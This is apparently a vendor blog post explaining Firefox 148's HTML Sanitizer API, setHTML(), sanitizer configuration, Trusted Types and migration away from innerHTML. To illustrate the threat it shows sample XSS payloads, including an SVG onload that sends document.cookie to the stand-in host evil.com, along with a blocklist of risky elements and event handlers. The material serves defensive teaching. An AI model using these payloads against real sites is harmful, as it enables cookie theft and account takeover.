
Goodbye innerHTML: How Firefox 148's Sanitizer API Boosts XSS Protection

February 24, 2026 / OpDeck Team
XSS Protection · HTML Sanitizer · Firefox 148 · Web Security · API Features

Cross-site scripting has haunted the web for decades, yet it stubbornly refuses to die. Now, with Firefox 148 shipping the first standardized implementation of the HTML Sanitizer API, the browser itself is finally stepping up to be a first-class partner in the fight against XSS. The introduction of setHTML() as a safe, native replacement for innerHTML is a watershed moment for web security — and every developer building dynamic web applications needs to understand what it means for their code today.

The Stubborn Persistence of XSS

Before diving into the new API, it's worth confronting an uncomfortable truth: XSS is not a solved problem. Not even close.

According to MITRE's 2025 list of the top 25 most dangerous software weaknesses, cross-site scripting kept the top spot, ahead of SQL injection and cross-site request forgery. This isn't a new development: XSS has been a perennial threat for years. In H1 2025, Cross-Site Scripting again led the top five weakness types by CWE classification, appearing more often than any other and enabling attackers to inject malicious scripts into web pages.

The scale of the problem is staggering. Between July 2024 and July 2025, XSS vulnerabilities accounted for 15% of all "Important" or "Critical" security cases handled by the Microsoft Security Response Center (MSRC). Since January 2024, the MSRC has mitigated more than 970 XSS cases, demonstrating the consistent effort required to manage this vulnerability class. And assessments from 2025 identified 6,227 XSS vulnerabilities in web applications.

Why does XSS persist so stubbornly? Cross-site scripting vulnerabilities are among the most common web application security concerns partly because they are easy to introduce but hard to discover and fix, so there is always a danger that they will reach production code. The root cause is almost always the same: web applications often need to work with untrusted HTML on the client side, whether as part of a client-side templating solution, when rendering user-generated content, or when including data from another site. Injecting that untrusted HTML into the DOM can make a site vulnerable to a range of attacks, particularly XSS attacks in which the injected markup ends up executing JavaScript in the context of the current origin.

The innerHTML Problem: A Familiar Danger

For most web developers, the gateway to XSS is a deceptively simple property: innerHTML. The innerHTML property is probably the most common vector for cross-site scripting attacks, where potentially unsafe strings provided by a user are injected into the DOM without first being sanitized. While the property does prevent <script> elements from executing when they are injected, it is susceptible to many other ways that attackers can craft HTML to run malicious JavaScript.

Consider a scenario where you're building a comment system or a rich-text editor. A user submits some HTML-formatted text, and you want to display it on the page. The naive approach looks like this:

// ⚠️ DANGEROUS — never do this with untrusted input
document.getElementById('comment').innerHTML = userProvidedContent;

Even if you think you've blocked <script> tags, attackers have an arsenal of vectors at their disposal:

<!-- Event handler injection -->
<img src="x" onerror="stealCookies()">

<!-- JavaScript URI in anchor tags -->
<a href="javascript:alert(document.cookie)">Click me</a>

<!-- SVG-based payloads -->
<svg onload="fetch('https://evil.com/?c='+document.cookie)">

Because innerHTML accepts any HTML string, it remains wide open to XSS payloads. This is exactly why the setHTML() method accepts a sanitizer instance and strips potentially harmful HTML content before injecting new nodes into the DOM.

The Third-Party Library Era: DOMPurify and Its Limits

The web development community's response to this problem has been to reach for third-party libraries, with DOMPurify as the de facto standard. Now, though, browsers can handle this natively. DOMPurify is excellent, but it comes with inherent limitations that the native Sanitizer API is designed to overcome.

These libraries manage the XSS problem by carefully parsing and sanitizing strings before insertion: they construct a DOM and filter its members through an allow-list. This has proven to be a fragile approach, because the parsing APIs exposed to the web don't always map cleanly onto the browser's behavior when it actually renders a string as HTML in the "real" DOM. Moreover, these libraries must keep pace with browsers' changing behavior over time; things that once were safe can turn into time-bombs when new platform-level features land.

This fragility has been demonstrated in practice. Researchers have documented how certain DOMPurify configurations can lead to mutation XSS (mXSS) — a particularly nasty class of attack where the browser's HTML parser mutates a sanitized string back into something dangerous. Certain configurations of DOMPurify can lead to a downgrade in sanitization protection, resulting in a full bypass even in the latest version.

Additionally, third-party libraries add bundle size, require version management, and depend on their authors staying ahead of new browser quirks. With the safe HTML sanitization methods, they should no longer be necessary: the API is integrated with the browser, and it is far more aware of the parsing context, and of what code is allowed to execute, than any external parser library can be.

Enter the Sanitizer API: Native XSS Protection in Firefox 148

The new standardized Sanitizer API provides a straightforward way for web developers to sanitize untrusted HTML before inserting it into the DOM. Firefox 148 is the first browser to ship this standardized security-enhancing API, advancing a safer web for everyone — and other browsers are expected to follow soon.

The main entry points are the Sanitizer constructor, which stores configuration, and the Element.setHTML(), ShadowRoot.setHTML(), and Document.parseHTML() methods.

How setHTML() Works

The element.setHTML() method enables developers to insert HTML content similarly to element.innerHTML, but without the security vulnerabilities such as cross-site scripting. The setHTML() method integrates sanitization directly into HTML insertion, providing safety by default.

The most basic usage is a true drop-in replacement for innerHTML:

// ✅ SAFE — XSS-unsafe content is automatically stripped
const target = document.getElementById('comment');
target.setHTML(userProvidedContent);

The browser automatically strips out dangerous elements like <script>, event handlers like onclick, and other XSS vectors.

Here's a concrete example of what gets sanitized:

const untrustedHTML = `
  <h1>Hello!</h1>
  <img src="x" onerror="stealCookies()">
  <script>alert('XSS')<\/script>
  <a href="javascript:void(0)" onclick="attack()">Click me</a>
  <p>This paragraph is safe.</p>
`;

document.getElementById('output').setHTML(untrustedHTML);
// Result: <h1>Hello!</h1><img src="x"><a>Click me</a><p>This paragraph is safe.</p>
// The onerror, onclick, and script are all stripped automatically

The default Sanitizer allows only XSS-safe input: it omits elements such as <script>, <frame>, <iframe>, <object>, and <use> from its allow lists, strips event handler attributes, and disallows data attributes and comments. This default configuration is used whenever "default", or no sanitizer at all, is passed to the safe methods.

The Sanitizer Class: Configurable, Reusable Protection

For use cases that require more fine-grained control, the API provides the Sanitizer constructor. The Sanitizer interface defines a configuration object that specifies what elements, attributes, and comments are allowed or should be removed when inserting strings of HTML into an Element or ShadowRoot, or when parsing an HTML string into a Document.

You can configure the sanitizer in two modes: an allowlist approach (specify what's permitted) or a blocklist approach (specify what to remove).

Allowlist example — only permit specific elements:

// Only allow formatted text elements
const strictSanitizer = new Sanitizer({
  elements: ["p", "strong", "em", "b", "i", "ul", "ol", "li", "br"]
});

document.getElementById('output').setHTML(userContent, {
  sanitizer: strictSanitizer
});

Blocklist example — remove specific dangerous elements while allowing everything else:

// Start permissive, but block specific dangerous elements
const permissiveSanitizer = new Sanitizer({
  removeElements: ["script", "iframe", "object", "embed"],
  removeAttributes: ["onclick", "onerror", "onload", "onmouseover"]
});

document.getElementById('output').setHTML(userContent, {
  sanitizer: permissiveSanitizer
});

Per-element attribute control — fine-grained attribute rules:

// Allow h1 and h2, but control which attributes each can have
const precisionSanitizer = new Sanitizer({
  elements: [
    { name: "h1", attributes: [] },           // h1 gets no attributes
    { name: "h2", attributes: ["style"] },    // h2 can have style
    { name: "a", attributes: ["href"] },      // anchor only gets href
    "p", "strong", "em"
  ]
});

If the default configuration of setHTML() is too strict (or not strict enough) for a given use case, developers can provide a custom configuration that defines which HTML elements and attributes should be kept or removed.

One critical guarantee sets the native API apart from libraries: the goal of the Sanitizer API is to ensure that, no matter how you use it or configure it, XSS will not occur. This is both a strength and a constraint. Even if you configure a custom sanitizer that explicitly allows a <script> element, the setHTML() method will still strip it. The browser enforces safety at the platform level, not just the library level.
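
That platform-level guarantee can be sketched in a few lines (browser-only code; the function name and markup are illustrative, not from the spec):

```javascript
// A deliberately over-permissive config that requests <script>.
// Even so, the safe setHTML() method refuses to insert executable script:
// the configured allow list is intersected with the browser's XSS-safe baseline.
function setHTMLWithLaxConfig(el, html) {
  const lax = new Sanitizer({ elements: ["p", "script"] }); // "script" requested...
  el.setHTML(html, { sanitizer: lax });                     // ...but stripped anyway
}
```

Running this in Firefox 148 against markup like `<p>ok</p><script>alert(1)</script>` leaves the paragraph in the DOM while the script is removed, despite the config asking for it.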

Document.parseHTML(): Parsing Without Insertion

Beyond setHTML(), the API also introduces Document.parseHTML() for cases where you need to parse and sanitize HTML without immediately inserting it into the DOM.

Document.parseHTML() is an XSS-safe method to parse and sanitize a string of HTML in order to create a new Document instance.

// Parse and sanitize without inserting into the DOM
const safeDocument = Document.parseHTML(untrustedHTML);

// Now you can inspect, manipulate, or selectively use the parsed content
const headings = safeDocument.querySelectorAll('h1, h2, h3');
headings.forEach(heading => {
  // Work with sanitized content safely
  console.log(heading.textContent);
});

The safe methods are Element.setHTML(), ShadowRoot.setHTML(), and Document.parseHTML(). The unsafe variants — Element.setHTMLUnsafe(), ShadowRoot.setHTMLUnsafe(), and Document.parseHTMLUnsafe() — also exist for cases where you need to inject trusted HTML that includes declarative shadow DOM or other intentionally "unsafe" constructs.
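
For instance, a component that relies on declarative shadow DOM needs the unsafe variant, because the safe methods strip <template shadowrootmode>. Here's a sketch; the markup is an invented example, and the function should only ever receive markup you authored yourself:

```javascript
// Inject developer-authored markup that uses declarative shadow DOM.
// setHTML() would strip the <template shadowrootmode>, so the unsafe
// variant is the right tool here. NEVER route user input through this.
function renderTrustedCard(el) {
  el.setHTMLUnsafe(`
    <template shadowrootmode="open">
      <style>h2 { color: rebeccapurple; }</style>
      <h2>Status: all systems go</h2>
    </template>`);
}
```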

Combining the Sanitizer API with Trusted Types

For teams that want the strongest possible XSS protection, the Sanitizer API is designed to work in concert with the Trusted Types API.

Trusted Types and the Sanitizer API share a common goal: preventing cross-site scripting. The two APIs complement each other: while the Sanitizer API provides a safe way to construct DOM trees, the Trusted Types API enforces that only sanitized content can be passed into unsafe DOM sinks, ensuring no developer can accidentally introduce XSS vulnerabilities into your codebase.

The Sanitizer API can be combined with Trusted Types, which centralize control over HTML parsing and injection. Once setHTML() is adopted, sites can enable Trusted Types enforcement more easily, often without requiring complex custom policies. A strict policy can allow setHTML() while blocking other unsafe HTML insertion methods, helping prevent future XSS regressions.

To enable Trusted Types, you set the appropriate Content Security Policy header:

Content-Security-Policy: require-trusted-types-for 'script'; trusted-types my-policy

setHTML() and Document.parseHTML() are not unsafe sinks, so they will not cause an error when Trusted Types is enabled: you pass them plain strings, not TrustedHTML objects. Migrating to setHTML() therefore reduces the complexity of your Trusted Types implementation, since there are fewer unsafe sinks to wrap.

Migration Guide: Replacing innerHTML in Your Codebase

Migrating from innerHTML to setHTML() is intentionally straightforward for most use cases. Developers can opt into stronger XSS protections with minimal code changes by replacing error-prone innerHTML assignments with setHTML().

Step 1: Feature Detection and Progressive Enhancement

Since Firefox 148 is the first browser to ship this API, you'll need a fallback strategy for other browsers. Check for support with if ('Sanitizer' in window) and fall back to DOMPurify or another library.

function safeSetHTML(element, htmlString, sanitizerConfig = null) {
  if ('setHTML' in element) {
    // Native Sanitizer API — Firefox 148+ and future browsers
    const options = sanitizerConfig ? { sanitizer: sanitizerConfig } : {};
    element.setHTML(htmlString, options);
  } else {
    // Fallback for browsers without Sanitizer API support
    // Use DOMPurify as a polyfill
    element.innerHTML = DOMPurify.sanitize(htmlString);
  }
}

// Usage
const target = document.getElementById('content');
safeSetHTML(target, userProvidedHTML);

Step 2: Audit Your innerHTML Usage

Run a search across your codebase for all innerHTML assignments. Tools like ESLint with the no-unsanitized plugin can help automate this. For each occurrence, ask:

  1. Is the content user-provided or from an external source? → Replace with setHTML()
  2. Is the content purely from your own trusted server templates? → Consider setHTMLUnsafe() with a sanitizer, or keep innerHTML with a comment explaining why it's trusted
  3. Is the content plain text only? → Replace with textContent (no sanitization overhead needed at all)
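
As a rough starting point for that audit, a grep-level scan can flag candidate lines for review. This is a heuristic sketch, not a JavaScript parser: it will miss dynamic property access and can flag matches inside comments, so treat every hit as a question, not a verdict:

```javascript
// Heuristic scan for innerHTML assignments and dangerouslySetInnerHTML usage.
// Returns { line, text } records for each suspicious line in a source string.
function findRiskySinks(source) {
  const pattern = /\.innerHTML\s*[+]?=|dangerouslySetInnerHTML/;
  return source
    .split('\n')
    .map((line, i) => ({ line: i + 1, text: line.trim() }))
    .filter(({ text }) => pattern.test(text));
}
```

Feed it each file's contents and walk every hit through the three questions above.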

Step 3: Handle React's dangerouslySetInnerHTML

React developers face a slightly different challenge. They often reach for the sanitize-html library (or DOMPurify) together with React's dangerouslySetInnerHTML prop to render HTML strings into the DOM. As the Sanitizer API becomes a cross-browser standard, React will be able to offer a developer-friendly way to sanitize and inject arbitrary HTML strings without affecting bundle size.

In the meantime, you can create a utility component that uses the native API when available:

import { useEffect, useRef } from 'react';
import DOMPurify from 'dompurify';

function SafeHTML({ html, sanitizerConfig }) {
  const ref = useRef(null);

  useEffect(() => {
    if (!ref.current) return;

    if ('setHTML' in ref.current) {
      const options = sanitizerConfig ? { sanitizer: sanitizerConfig } : {};
      ref.current.setHTML(html, options);
    } else {
      // DOMPurify fallback
      ref.current.innerHTML = DOMPurify.sanitize(html);
    }
  }, [html, sanitizerConfig]);

  return <div ref={ref} />;
}

// Usage
<SafeHTML html={userGeneratedContent} />

Step 4: Watch Out for mXSS with Serialization

One important caveat: the Sanitizer API itself is not directly affected by mutation XSS. However, if a developer retrieves a sanitized node tree as a string via .innerHTML and then parses it again, mutation XSS can occur, a practice the specification explicitly discourages.

In other words, don't do this:

// ⚠️ Anti-pattern — re-serializing a sanitized DOM tree
element.setHTML(untrustedHTML);
const serialized = element.innerHTML; // Serialize back to string
anotherElement.innerHTML = serialized; // Re-inject — potential mXSS!

Instead, work with the DOM nodes directly rather than serializing back to strings.
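
A node-level alternative might look like this sketch (adoptSanitizedChildren is a hypothetical helper name, not part of the API):

```javascript
// Move already-sanitized nodes directly instead of round-tripping them
// through a string, which is what reopens the door to mutation XSS.
function adoptSanitizedChildren(source, target) {
  while (source.firstChild) {
    // appendChild() moves the live node, so no re-parsing ever happens.
    target.appendChild(source.firstChild);
  }
}
```

After calling element.setHTML(untrustedHTML), pass element and the destination to this helper rather than reading element.innerHTML.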

Browser Support and the Road Ahead

The Sanitizer API ships enabled by default in Firefox 148, in line with the latest specification. It is available in Chrome Canary behind a flag. While Safari has not started implementation work, the Safari team does have a positive position on the API.

To experiment with the Sanitizer API before introducing it on a web page, Mozilla recommends exploring the Sanitizer API playground at sanitizer-api.dev.

The cross-browser story will improve. The specification has been in active development with positive engagement from engineers across all three browser engines, and is tracked as a stage 2 proposal for upstreaming into the WHATWG HTML standard.

Security Headers Still Matter: A Layered Defense

The Sanitizer API is a powerful tool, but it's not a silver bullet. Firefox has been deeply involved in solutions for XSS from the beginning, starting with spearheading the Content-Security-Policy standard in 2009. CSP allows websites to restrict which resources — scripts, styles, images, etc. — the browser can load and execute, providing a strong line of defense against XSS.

However, despite a steady stream of improvements and ongoing maintenance, CSP did not gain sufficient adoption to protect the long tail of the web, as it requires significant architectural changes for existing websites and continuous review by security experts. The Sanitizer API is designed to help fill that gap by providing a standardized way to turn malicious HTML into harmless HTML.

This means the best security posture combines both approaches:

  • setHTML() / Sanitizer API — prevents XSS at the point of DOM injection
  • Content-Security-Policy — provides a network-level backstop if injection still occurs
  • Trusted Types — enforces that all DOM sinks go through sanitization
  • Input validation — server-side validation as the first line of defense

You can audit your current security header posture using OpDeck's Vulnerability Scanner, which checks for missing or misconfigured security headers including CSP, and the SSL Certificate Checker to ensure your transport layer is properly secured. For a broader view of how your site performs and what technologies are in play, the Website Performance Analyzer and Tech Stack Detector can help you understand your full attack surface.

Also worth noting: one of the most striking findings from security assessments in 2025 was the continued struggle with HTTP security headers — particularly Content Security Policy and HTTP Strict Transport Security. Despite both mechanisms being well established for over a decade, they remain among the most misunderstood and inconsistently implemented security controls. Almost half of tested applications (43%) had no CSP header defined at all, and an additional 19% had a CSP in place that was overly permissive or fundamentally weak.

What This Means for the Web Platform

Firefox 148's shipping of the Sanitizer API is more than just a new browser feature — it represents a philosophical shift in how the web platform approaches security. Rather than leaving sanitization to individual developers or third-party libraries, the browser itself is now a first-class participant in keeping users safe.

The browser has a fairly good idea of when it is going to execute code. A native sanitizer can therefore improve on user-space libraries by teaching the browser itself how to render HTML from an arbitrary string safely, in a way that is far more likely to be maintained and updated alongside the browser's own evolving parser implementation.

This is the key insight: a browser-native sanitizer will always be in sync with the browser's own parser. When a new HTML feature is added that could create a new XSS vector, the browser's sanitizer can be updated simultaneously. External libraries, no matter how well maintained, are always playing catch-up.

Once browser support for the Sanitizer API improves, third-party tools like DOMPurify will be unnecessary in most cases. Even the Trusted Types createHTML boilerplate becomes avoidable, since you can simply use setHTML() instead.

Conclusion

The arrival of setHTML() and the Sanitizer API in Firefox 148 is one of the most meaningful security improvements the web platform has seen in years. The Sanitizer API enables an easy replacement of innerHTML assignments with setHTML() in existing code, introducing a new safer default to protect users from XSS attacks on the web. For the first time, developers have a standardized, browser-native, zero-dependency way to safely inject untrusted HTML — and the security guarantee is stronger than any library can provide.

The migration path is clear: start using feature detection today, adopt setHTML() wherever you're currently using innerHTML with user-provided content, and layer it with CSP and Trusted Types for defense in depth. As Chrome and Safari follow Firefox's lead, the Sanitizer API will become the new baseline for safe DOM manipulation across the entire web.

Now is the time to audit your codebase. Search for every innerHTML assignment, every dangerouslySetInnerHTML in your React components, and every place you're trusting a third-party library to stand between your users and attackers. Then start replacing them.


Ready to assess your site's security posture? Use OpDeck's Vulnerability Scanner to check your security headers, identify XSS-related misconfigurations, and get actionable recommendations — all in seconds, without installing anything. Pair it with the SEO Audit and Website Performance Analyzer to get a complete picture of your site's health. Security and performance go hand in hand — OpDeck helps you stay on top of both.